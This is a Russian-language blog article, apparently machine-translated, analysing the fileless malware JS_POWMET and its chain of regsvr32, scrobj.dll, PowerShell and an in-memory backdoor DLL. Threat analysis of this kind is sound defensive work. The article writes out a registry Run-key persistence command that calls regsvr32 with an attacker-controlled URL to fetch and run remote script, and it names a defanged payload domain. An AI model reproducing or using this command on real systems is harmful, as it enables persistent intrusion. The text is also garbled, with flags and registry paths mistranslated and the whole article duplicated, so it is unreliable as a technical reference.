Fileless вредоносных программ становится все более популярным в деятельности взломщиков. Что впервые был замечен в некоторых сложных целенаправленных атак становится стандартным частично из-за хранилища 7 утечек, который показал методы работы ЦРУ.
Там, кажется, путаница в определении fileless вредоносных программ, так что новостные сайты часто говорят, вредоносные программы fileless, хотя это наверняка не fileless. Как правило, речь идет о Core бэкдор сидит на удаленном компьютере, который загружает зашифрованной полезной нагрузки, а в памяти.
В этой статье мы рассмотрим действительно fileless обеспечением, которое не требует никаких файлов, чтобы пережить перезагрузку. Пример я выбрал впервые проанализированы угрозы. Команда за кампании приложили немало усилий для того, чтобы остаться в рамках программы анти-вирус и радар аналитика.
Метод компромата неизвестно, поскольку вредоносные программы удаляются все системные журналы. Я подозреваю, что он использовал некоторые Уязвимость, делающая возможным удаленное выполнение кода, чтобы создать следующий раздел реестра:
1
2
3
Раздел реестра hkey_current_user\программное обеспечение\Майкрософт\окна\CurrentVersion равное\запустить
Ком+ = “команду regsvr32 /ы /н /у /Я:{URL-адрес , контролируемых путем злоумышленники} такие же.dll файлы”
Это все, что вредоносные программы (удаленный администратор) должен сохраняться на вашем компьютере. Этот ключ реестра будет загружать и выполнять программы JavaScript окрестили JS_POWMET.
Regsvr32 в командной строке утилиты Windows для регистрации и отмены регистрации (/у) библиотеки dll
параметр /s = помолчал команду regsvr32
/н = говорит regsvr32 и не использовать для dllregisterserver
/у = отмена регистрации сервера/объект
/я = используется для передачи необязательный параметр (т. е. URL-Адрес) для DLLinstall
компонент скрипта во время выполнения scrobj.dll = Майкрософт (это находится в каждой системе Windows)
При запуске, scrobj.dll загружает вредоносный JavaScript из найденных на URL-адрес и выполняет его без сохранения его в файловую систему. Что полезного Windows, встроенный в функциональности! Некоторые примеры XML-файлов, которые могут быть использованы, как это можно найти на гитхабе.
В любом случае, этот JavaScript код загружает и выполняет скрипт PowerShell, который окрестили PS_INJECT, который в свою очередь загружает другой файл из “hxxps://bogerando[.]ру/фавикон”, который фактически закодирован и зашифрован dll файлы окрестили BKDR_ANDROM. Обратите внимание, что эта dll загружается в буфер памяти и он не соприкасается с поверхностью диска. Следующее изображение показывает, как BKDR_ANDROM декодируется и расшифрованы в PS_INJECT. После этого, PS_INJECT приступает к выполнению инструкции расшифровываются в своем собственном процессе, эффективно владеющий машиной.
Этот способ работы выгоден не только с точки зрения анти-вируса уклонения, но это также позволяет злоумышленникам менять полезную нагрузку в любой момент, просто изменив код JavaScript, который размещается на их сервере. Если вы следовали мои предыдущие статьи о хранилище 7 утечка, вы, вероятно, заметили сходство в этих техниках – самое главное, вредоносный код загружается в зашифрованном виде и расшифровывается в памяти. Вредоносный код-это зашифрованная в сети и даже никогда не коснется диска. Это большая проблема для антивирусных вендоров, некоторые из которых являются развитие памяти функции сканирования, но я не смотрю на это оптимистично. Я с нетерпением жду нейронных сетей в анти-вирус за кулисами, это будет очень интересно.
Fileless вредоносные программы часто злоупотребляет Windows встроенные функции, такие как PowerShell и большинство людей, что скомпрометированные даже не использовать эти функции. Неважно, какую операционную систему Вы используете, вы можете отключить службы, которые вам не нужны.
Там, кажется, путаница в определении fileless вредоносных программ, так что новостные сайты часто говорят, вредоносные программы fileless, хотя это наверняка не fileless. Как правило, речь идет о Core бэкдор сидит на удаленном компьютере, который загружает зашифрованной полезной нагрузки, а в памяти.
В этой статье мы рассмотрим действительно fileless обеспечением, которое не требует никаких файлов, чтобы пережить перезагрузку. Пример я выбрал впервые проанализированы угрозы. Команда за кампании приложили немало усилий для того, чтобы остаться в рамках программы анти-вирус и радар аналитика.
Метод компромата неизвестно, поскольку вредоносные программы удаляются все системные журналы. Я подозреваю, что он использовал некоторые Уязвимость, делающая возможным удаленное выполнение кода, чтобы создать следующий раздел реестра:
1
2
3
Раздел реестра hkey_current_user\программное обеспечение\Майкрософт\окна\CurrentVersion равное\запустить
Ком+ = “команду regsvr32 /ы /н /у /Я:{URL-адрес , контролируемых путем злоумышленники} такие же.dll файлы”
Это все, что вредоносные программы (удаленный администратор) должен сохраняться на вашем компьютере. Этот ключ реестра будет загружать и выполнять программы JavaScript окрестили JS_POWMET.
Regsvr32 в командной строке утилиты Windows для регистрации и отмены регистрации (/у) библиотеки dll
параметр /s = помолчал команду regsvr32
/н = говорит regsvr32 и не использовать для dllregisterserver
/у = отмена регистрации сервера/объект
/я = используется для передачи необязательный параметр (т. е. URL-Адрес) для DLLinstall
компонент скрипта во время выполнения scrobj.dll = Майкрософт (это находится в каждой системе Windows)
При запуске, scrobj.dll загружает вредоносный JavaScript из найденных на URL-адрес и выполняет его без сохранения его в файловую систему. Что полезного Windows, встроенный в функциональности! Некоторые примеры XML-файлов, которые могут быть использованы, как это можно найти на гитхабе.
В любом случае, этот JavaScript код загружает и выполняет скрипт PowerShell, который окрестили PS_INJECT, который в свою очередь загружает другой файл из “hxxps://bogerando[.]ру/фавикон”, который фактически закодирован и зашифрован dll файлы окрестили BKDR_ANDROM. Обратите внимание, что эта dll загружается в буфер памяти и он не соприкасается с поверхностью диска. Следующее изображение показывает, как BKDR_ANDROM декодируется и расшифрованы в PS_INJECT. После этого, PS_INJECT приступает к выполнению инструкции расшифровываются в своем собственном процессе, эффективно владеющий машиной.
Этот способ работы выгоден не только с точки зрения анти-вируса уклонения, но это также позволяет злоумышленникам менять полезную нагрузку в любой момент, просто изменив код JavaScript, который размещается на их сервере. Если вы следовали мои предыдущие статьи о хранилище 7 утечка, вы, вероятно, заметили сходство в этих техниках – самое главное, вредоносный код загружается в зашифрованном виде и расшифровывается в памяти. Вредоносный код-это зашифрованная в сети и даже никогда не коснется диска. Это большая проблема для антивирусных вендоров, некоторые из которых являются развитие памяти функции сканирования, но я не смотрю на это оптимистично. Я с нетерпением жду нейронных сетей в анти-вирус за кулисами, это будет очень интересно.
Fileless вредоносные программы часто злоупотребляет Windows встроенные функции, такие как PowerShell и большинство людей, что скомпрометированные даже не использовать эти функции. Неважно, какую операционную систему Вы используете, вы можете отключить службы, которые вам не нужны.